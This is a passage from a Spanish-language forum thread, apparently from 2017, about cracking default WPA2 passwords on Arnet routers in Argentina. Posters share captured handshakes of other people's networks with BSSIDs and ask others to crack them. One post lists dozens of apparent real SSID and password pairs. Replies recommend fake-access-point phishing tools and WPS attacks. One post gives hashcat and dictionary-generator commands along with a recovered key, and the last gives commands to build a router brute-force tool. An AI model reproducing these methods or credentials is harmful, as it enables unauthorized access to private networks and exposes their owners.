Seguridad: WPA2
Router: SAGEMCOM (Broadcom)
Modelo: Broadcom
http://www.mediafire.com/file/92zi6l84lmmncbm/WiFi-Arnet-kyet_%28A0-1B-29-3A-3E-8C%29.cap

Nombre: WiFi-Arnet-C0C2E5
BSSID: 30:91:8F:C0:C2:E5
Seguridad: WPA2
Router: Technicolor
Modelo: MediaAccess TG 588V (Nro de serie: 1511CZ5C5)
http://www.mediafire.com/file/n98dh7aydxdumzj/WiFi-Arnet-C0C2E5-30-91-8F-C0-C2-E5.cap

- Si tienen algun error para descargar me avisan. Saludos! Y gracias de antemano.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: daniel0600 en 05 de Marzo de 2017, 01:59:22 pm
Hola gente buenas tardes de nuevo tengo un hand.

Nombre: WiFi-Arnet-C7BD51
BSSID: C4:EA:1D:C7:BD:51
Seguridad: WPA2
Router: Technicolor
Modelo: MediaAccess TG582n v2

Ya probe con todos los programas wifislax para wps, y el router se bloquea.
Asi que me decidi de hacerle un brute-force, teniendo en cuenta algunos datos que es la contraseña
es HEXA de 10 caractares. pero se hace eterno el proceso.
¿Alguna idea de como reducir el tiempo del proceso?¿O si tienen algun dato mas de estos router vdsl?

(http://thumbs.subefotos.com/19c2af464d589af48646225c054a4924o.jpg) (http://subefotos.com/ver/?19c2af464d589af48646225c054a4924o.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hydra en 19 de Marzo de 2017, 07:11:41 pm
Detalle técnico, los TP-Link tienen el WPS como la WPA, osea todos numero, captura un hand y le paso el dic haber que onda.

Esa es una cuestión que no la sabía, justo si me permite, me gustaría consultarle maestro :D.

O sea, que si capturo el cap de un wps activo ¿puedo pasarle un diccionario que contenga todas las combinaciones de pines y sale el pin?                                                                                                       ¿o se trata de otro metodo? Ya que de ser posible la idea de poder sacar el cap y pasarle lo de un diccionaro wps me gusta, evitando así que se active el bloqueo del mismo router.

Corríjame y/o orienteme sí es posible, dado que fue una idea que se me cruzo por la cabeza al leerlo :)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: maxionline en 23 de Marzo de 2017, 06:40:36 pm
Esa es una cuestión que no la sabía, justo si me permite, me gustaría consultarle maestro :D.

O sea, que si capturo el cap de un wps activo ¿puedo pasarle un diccionario que contenga todas las combinaciones de pines y sale el pin?                                                                                                       ¿o se trata de otro metodo? Ya que de ser posible la idea de poder sacar el cap y pasarle lo de un diccionaro wps me gusta, evitando así que se active el bloqueo del mismo router.

Corríjame y/o orienteme sí es posible, dado que fue una idea que se me cruzo por la cabeza al leerlo :)

Segun sé. el WPS es un ataque al pin de autoconfiguracion, distinto completamente a los handshakes capturados. Con los handshakes (name.cap) por diccionario o fuerza bruta se puede sacar el wireless key, pero nada que ver con el pin de wps.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hydra en 24 de Marzo de 2017, 12:05:50 am
Segun sé. el WPS es un ataque al pin de autoconfiguracion, distinto completamente a los handshakes capturados. Con los handshakes (name.cap) por diccionario o fuerza bruta se puede sacar el wireless key, pero nada que ver con el pin de wps.

Le agradezco desde ya la respuesta y la aclaración compadre. La verdad es que es una pena, dado que de funcionar, habría sido más lento, pero seguro de sacar un pin, evitando así el bloqueo :(.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: maxionline en 26 de Marzo de 2017, 10:40:47 pm
Puse mis sucias manos sobre un modem de los que creo que son los nuevos de Arnet WiFi-Arnet-XXXXXX
, TG582n V2, saqué una foto que salio mas o menos pero se lee lo importante, la pego acá a ver si a alguien le sirve para idear algún patrón de wps o de la clave wireless.

(http://i.imgur.com/hS2z5Kk.jpg)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: kitt2000 en 28 de Marzo de 2017, 11:07:20 am
Hola a todos... la verdad que esta muy buena la colaboracion de todos en este tema.... no se si será el lugar correcto para postearlo, pero...

Alguien se puso a comparar las posibilidades de diferentes soluciones para busqueda de contraseñas para trabajar de manera distribuida?... Hay soluciones forenses que soportan computacion distribuida para buscar claves en múltiples formatos, pero no he visto que apliquen a busqueda de contraseñas en redes wireless.

Por esto se me ocurre que por ahi podriamos armar una red entre las pcs que tenemos entre todos para busqueda de contraseñas con fines colaborativos para realizar investigaciones, ya que la union hace la fuerza... por ejemplo, esta red vendría genial para colaborar en confirmar/refutar teorías en este post...

El tema es que hasta el momento he buscado soluciones que hagan esto pero no encontré nada... y es muy probable que ya exista... Que les parece la idea?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: maxifor en 19 de Abril de 2017, 04:25:54 pm
Estimados, los saludo de antemano y les comento que soy nuevo en este tema del wifislax, pude sacar unas Handshake de Arnet, si alguno me da una mano con las claves me hace un enorme favor.

SSID:WiFi-Arnet-i5ch
BSSID:98:DE:D0:E4:0C:8E
MANUFACTURER: TP-LINK TECHNOLOGIES CO
CHAN:3
WPA2-PSK + WPS
https://www.dropbox.com/s/etv0eb0hb7ebox5/WiFi-Arnet-i5ch%20%2860-31-97-35-51-24%29.cap?dl=0

SSID:WiFi-Arnet-3xct
BSSID:86:F1:FF:B4:9B:35
MANUFACTURER: ?????
CHAN:1
WPA-PSK
https://www.dropbox.com/s/kyelmq3jkp5s5tp/WiFi-Arnet-3xct%20%2886-F1-FF-B4-9B-35%29.cap?dl=0
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diegobenti en 20 de Mayo de 2017, 12:59:14 am
WiFi-Arnet-T08z   38-4b-50-39-25-7f   WPA-PSK   CCMP      
Como estan gente aver si me ayudan con esta red, saben si se puede sacar algo ? saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: zafiro en 16 de Julio de 2017, 04:27:29 pm
Hola, soy aficionado y no un experto. Estoy intentando someter a prueba la hipótesis de que las claves originales de Arnet se componen de una combinación de de letras mayúsculas y números con extensión mímima y máxima de diez componentes.

Estoy utilizando el programa AIRGEDON que forma parte de WIFISLAX. Me ha resultado sencillo montar el programa y ponerlo a funcionar... PERO...

Lleva 25 horas dedicadas en exclusiva en una notebook de la cual puedo prescindir y que está trabajando a razón de entre 1250 y 140 k/s...

En 25 horas lleva examinadas 110 millones de combinaciones.... PERO...

Multitud de esas combinaciones efectuadas SON INÚTILES E IMPOSIBLES...

De hecho en éste momento va por AAAAB3---- (los últimos cuatro términos vuelan)...

Es posible que los autores del programa hayan corregido los cálculos inútiles y yo a no haber actualizado el programa esté haciendo trabajar la notebook en vano por días y días...

Existen MILLONES DE COMBINACIONES IMPOSIBLES que mi máquina está examinando en éste momento... por ejemplo uno puede suponer que ninguna clave se compondrá de una misma letrao un mísmo número repetido tres veces en forma seguida (AAABCD3339 POR CITAR UNO DE MILLONES DE EJEMPLOS)...

Estoy decidiendo abortar porque esa deficiencia la juzgo determinante para no seguir adelante.

El Handshake del router que estoy tratando develar: https://drive.google.com/file/d/0B1biWM6neInlMU41M254WmNSNDA/view?usp=sharing
 
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: zafiro en 16 de Julio de 2017, 04:29:57 pm
Quise decir "entre 1250 y 1450 k/s"
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diego10 en 16 de Julio de 2017, 06:24:45 pm
es la poca velocidad de proceso lo que te tendria que hacer desistir
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ciccio2 en 30 de Agosto de 2017, 09:54:28 am
hi , sorry for the english, but i think you will understand better me if i talk in this language cause google translate sometimes fails.

i have a net with ADB BROADBAND ITALIA router :

MAC : F0:84:2F:48:98:02
SSID : FASTWEB-1-cM35gKIJqIYV

i tried with your script but the password was not correct. Could i do something else? The passwords seem very near, cause it's 10 characters here as wifi arnet-XXXX

waiting for your answer
Best regards
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Yoshitoshi en 08 de Septiembre de 2017, 07:54:34 pm
Hola, soy de Córdoba (Argentina). Tengo este handshake de Arnet (WiFi-Arnet-EF74) (A4:5D:A1:65:EF:75). Agradezco si me pueden dar una mano. Prometo un Fernet y Alfajores al que me ayude.

Link del HandShake: https://www.sendspace.com/file/93y9xq
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: juani_peiro en 17 de Septiembre de 2017, 12:39:28 am
(https://www.mediafire.com/file/wq40q3jbvggd0aj/IMG_20170906_120232663.jpg)Adjunto una foto de un modem huawei de arnet al que pude tomarle los datos y la pass en una visita a un domicilio, como no pude subirla como mensaje no se si va a aparecer, de todas formas dejo el link, ojala sirva como aporte. Saludos!

https://www.mediafire.com/file/wq40q3jbvggd0aj/IMG_20170906_120232663.jpg
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Teno en 10 de Octubre de 2017, 10:29:29 pm
Como es el tema de la complejidad de los diccionarios para Arnet? Porque me cansé de tirarle con todo a esto! Necesito una GPU ya!!!

https://mega.nz/#!ltR3mLQL!hmROdzXB5VIe2u-auk1niyqSBzBNLP8gKx0kEFewyfM

WiFi-Arnet-43287B C4:EA:1D:43:28:7B

Gracias a todos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Wired-PRO en 10 de Octubre de 2017, 11:32:34 pm
Como es el tema de la complejidad de los diccionarios para Arnet? Porque me cansé de tirarle con todo a esto! Necesito una GPU ya!!!

https://mega.nz/#!ltR3mLQL!hmROdzXB5VIe2u-auk1niyqSBzBNLP8gKx0kEFewyfM

WiFi-Arnet-43287B C4:EA:1D:43:28:7B

Gracias a todos!

arnet y telecentro esta complicado, utilizate las herramientas para falso AP como LINSET o FLUXION.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Teno en 11 de Octubre de 2017, 07:58:05 am
Voy a probar, tengo el AP a pocos metros!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ggbitton en 11 de Octubre de 2017, 10:13:33 pm
Buenas noches.! me podrían dar una mano con estas dos redes  :-X

https://drive.google.com/file/d/0B38JdnSTarNUUm5LbkdjUmRtWlE/view?usp=sharing

https://drive.google.com/file/d/0B38JdnSTarNUaEFsWnRBUWxSMDQ/view?usp=sharing
https://drive.google.com/file/d/0B38JdnSTarNURjMyNTV6aFQ5U00/view?usp=sharing

Muchas gracias.!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Wired-PRO en 11 de Octubre de 2017, 11:17:02 pm
Buenas noches.! me podrían dar una mano con estas dos redes  :-X

https://drive.google.com/file/d/0B38JdnSTarNUUm5LbkdjUmRtWlE/view?usp=sharing

https://drive.google.com/file/d/0B38JdnSTarNUaEFsWnRBUWxSMDQ/view?usp=sharing
https://drive.google.com/file/d/0B38JdnSTarNURjMyNTV6aFQ5U00/view?usp=sharing

Muchas gracias.!

como dije anteriormente, arnet y telecentro estan imposibles con sus claves alfanumericas.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: ladrondemochilas en 15 de Noviembre de 2017, 03:25:54 pm
Dejo una lista de contraseñas de wifi arnet si sirve de algo para analizar patrones, lo que tienen en comun a simple vista es que son contraseñas de longitud 13

SSID:         "WiFi-Arnet-02x5"
psk:          "l3ehlk3KgXPfk"
Key MGMT:     WPA-PSK
#160:
SSID:         "WiFi-Arnet-02x5"
psk:          "l3ehlk3KgXPfk"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#161:
SSID:         "WiFi-Arnet-1eeh"
psk:          "faXNeR37gc33i"
Key MGMT:     WPA-PSK
#162:
SSID:         "WiFi-Arnet-208v"
psk:          "3gjXVa4gCEblk"
Key MGMT:     WPA-PSK
#163:
SSID:         "WiFi-Arnet-208v"
psk:          "3gjXVa4gCEblk"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#164:
SSID:         "WiFi-Arnet-24w2"
psk:          "Xw74vw49A39zT"
Key MGMT:     WPA-PSK
#165:
SSID:         "WiFi-Arnet-26tr"
psk:          "9hlbdejmk3H7m"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#166:
SSID:         "WiFi-Arnet-32E9"
psk:          "9PfjwGw0hz"
Key MGMT:     WPA-PSK
#167:
SSID:         "WiFi-Arnet-44i5"
psk:          "NRk3wroXWqFp4"
Key MGMT:     WPA-PSK
#168:
SSID:         "WiFi-Arnet-44i5"
psk:          "NRk3wroXWqFp4"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#169:
SSID:         "WiFi-Arnet-6ko6"
psk:          "4nf7l3lfnFd3R"
Key MGMT:     WPA-PSK
#170:
SSID:         "WiFi-Arnet-7k05"
psk:          "H94zVKJ3FW43C"
Key MGMT:     WPA-PSK
#171:
SSID:         "WiFi-Arnet-7k05"
psk:          "H94zVKJ3FW43C"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#172:
SSID:         "WiFi-Arnet-8001"
psk:          "iVfb4eEhm494n"
Key MGMT:     WPA-PSK
#173:
SSID:         "WiFi-Arnet-8001"
psk:          "iVfb4eEhm494n"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#174:
SSID:         "WiFi-Arnet-98m5"
psk:          "fspijofrlqYhs"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#175:
SSID:         "Wifi-Arnet-9k4j"
psk:          "X9VnoKR7a4W77"
Key MGMT:     WPA-PSK
#176:
SSID:         "WiFi-Arnet-9wt3"
psk:          "7CTACVEUEKE3J"
Key MGMT:     WPA-PSK
#177:
SSID:         "WiFi-Arnet-9wt3"
psk:          "7CTACVEUEKE3J"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#178:
SSID:         "WiFi-Arnet-b546"
psk:          "jor2015lina"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#179:
SSID:         "WiFi-Arnet-b7ky"
psk:          "mvv7PFh4Th"
Key MGMT:     WPA-PSK
#180:
SSID:         "WiFi-Arnet-C3375B"
psk:          "0AC146FA19"
Key MGMT:     WPA-PSK
#181:
SSID:         "WiFi-Arnet-clc7"
psk:          "7w9A9NJ7EC4V3"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#182:
SSID:         "WiFi-Arnet-cx8b"
psk:          "3A3N37J47ETM3"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#183:
SSID:         "WiFi-Arnet-dj8t"
psk:          "l374NRK4dq779"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#184:
SSID:         "WiFi-Arnet-jlrj"
psk:          "P4WdWRcUXV3CP"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#185:
SSID:         "WiFi-Arnet-lre3"
psk:          "lxs949W3vTTu3"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#186:
SSID:         "WiFi-Arnet-nh76"
psk:          "3HHxJE3JMA34N"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#187:
SSID:         "WiFi-Arnet-qcee"
psk:          "tcj437kthc"
Key MGMT:     WPA-PSK
#188:
SSID:         "WiFi-Arnet-u1o9"
psk:          "e4Ve34jea9bdb"
Key MGMT:     WPA-PSK
#189:
SSID:         "WiFi-Arnet-v9et"
psk:          "Y9PY34H34P3F3"
Key MGMT:     WPA-PSK
#190:
SSID:         "WiFi-Arnet-v9et"
psk:          "Y9PY34H34P3F3"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#191:
SSID:         "WiFi-Arnet-yda2"
psk:          "344zvFXMXzEFx"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
#192:
SSID:         "WiFi-Arnet-zhc6"
psk:          "3UxmkHR9KkJtp"
Key MGMT:     WPA-PSK
Algorithm:    OPEN
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 19 de Noviembre de 2017, 08:58:53 am
Gracias por compartir ladrondemochilas.;)

El tema es romper via diccionario llevaría una eternidad mientras fritás la VGA o CPU.
La única que te queda es atacar WPS si lo tienen activo vía bully o reaver rogando que sean vulnerables o con mucha suerte vía linset/fluxion/wifimosys si el novato que está del otro lado es capaz de poner la pass wifi.
Arnet la hizo bien difícil.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Supehache en 25 de Noviembre de 2017, 12:37:34 am
Hola Gente, 
me aparecio una red nueva por la zona, urgutee un poco y la saqué por WPS con reaver.
obviamente es de arnet  y aqui van los datos

MODEM VDSL
MODELO VR9517VAC22-A-OS-AM

con MAC E4:BE:ED:XX:XX:XX

SSID WiFi-Arnet-cw8e-5G , la de 2.4G estaba cambiada




Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Supehache en 25 de Noviembre de 2017, 01:37:09 am
Hola otra vez!! :P

Crackee una Arnet de los Technicolor TG588v , esas con mac
C4:EA:1D:XX:XX:XX
que tienen clave Hexa de 10 Dígitos

tengo 60 KHash/s, toda la combinación me llevaría casi 230 días las 24hs del día! Imposible,
se me funde el GPU! :P
Escribo esto solo para contar mi experiencia, y tomenlo como metodo experimental,
a ver si alguien se atreve a repetirlo, con alguna super máquina,
ya que demora mucho tiempo y no creo q lo vuelva a repetir.
así que no me anden pidiendo que les busque la clave! jeje

La cosa es que usando un generador de nros Hexa saqué la clave en unos 40 días ,

sí, lo sé,
sigue siendo mucho tiempo, aunque solo dejaba corriendo el hashcat  por las noches unas 8 horas y cuando me acordaba.

La idea de intentarlo empezó cuando tras recopilar algunos patrones de claves, me doy cuenta ( y es lo que creo), que los números de la clave WPA en hexa van creciendo secuencialmente a medida q salen nuevos modem.
Tuve uno nuevo en la mano por 1 semana, su clave empezaba con 4 (solo tenia 5 claves y todas empezaabn con 1,2o3, por eso deduzco que es secuencial) y no pude vulnerarlo de ninguna forma, ni firmware, ni WPS, nada.

Por otro lado hace rato que tenia este soft

https://github.com/wpatoolkit/10-Hex-Generator (https://github.com/wpatoolkit/10-Hex-Generator)

es una utilidad para generar diccionarios en Hexa llamada 10hex, pero con modificadores para reducirlo en tamaño , elimininando combinaciones pocos probables,

así que si pienso que el primer dígito es del 1 al 4, solo tengo que hacer un diccionario de
 1 nro fijo + 9 variables en hexa , a lo sumo armo 4 diccionarios y los voy probando.

Para empezar Entonces cree un diccionario con esta línea

10hex.exe  -startswith2 –upper    -x7    –risky     >    g:\h2.txt

para generar un diccionario que empiece con el nro 2 (el mas repetido de las claves q encontré) + los 9 hexas y en mayúsculas. por ejemplo  2BE3614C57

-x7 es almenos 7 caracteres distintos,

Me ocupó menos de la mitad casi 300gb, por un archivo con todas las combinaciones de 1+9 hexa serían unos 640gb, esto es por cada uno de los nros q yo vaya eligiendo.
estem,  y si,  ovbio, ahora solo había que tener lugar en algún disco y tiempo :P

creo se puede hacer en modo piping, y usar la opción --session con el hashcat para no perder el progreso.

probé empezando con el nro 2 y luego el 4 pero  sin suerte
pero al empezar con el nro 3, saliooo!!! si señores!!


WiFi-Arnet-4A57F2:c4ea1d4a57f2:7840e43cb13e:32A8E5B721


por las dudas el manejo de session del hashcat las hice con estas líneas


hashcat64.exe -m 2500 arnet.hccap g:\h2.txt  --session hexa2

y para resumir

hashcat64.exe  --session hexa2 --restore


saludos


Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: badder en 30 de Noviembre de 2017, 06:51:24 pm
Encontré algo por si alguno tiene ganas de probar.
technicolor_bruteforce
Código: [Seleccionar]
git clone https://github.com/emanueleforestieri/technicolor_bruteforce.git
cd technicolor_bruteforce
gcc main.c -std=c99 -O3
./a.out
no lo probé a full porque no me da el cuero, pero lo pongo igual porque estamos en bolas con los modems VDSL de arnet de todas maneras.